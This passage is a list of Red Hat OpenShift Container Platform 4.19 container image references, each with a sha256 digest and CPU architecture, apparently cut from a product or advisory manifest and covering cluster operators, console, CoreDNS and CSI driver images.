"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
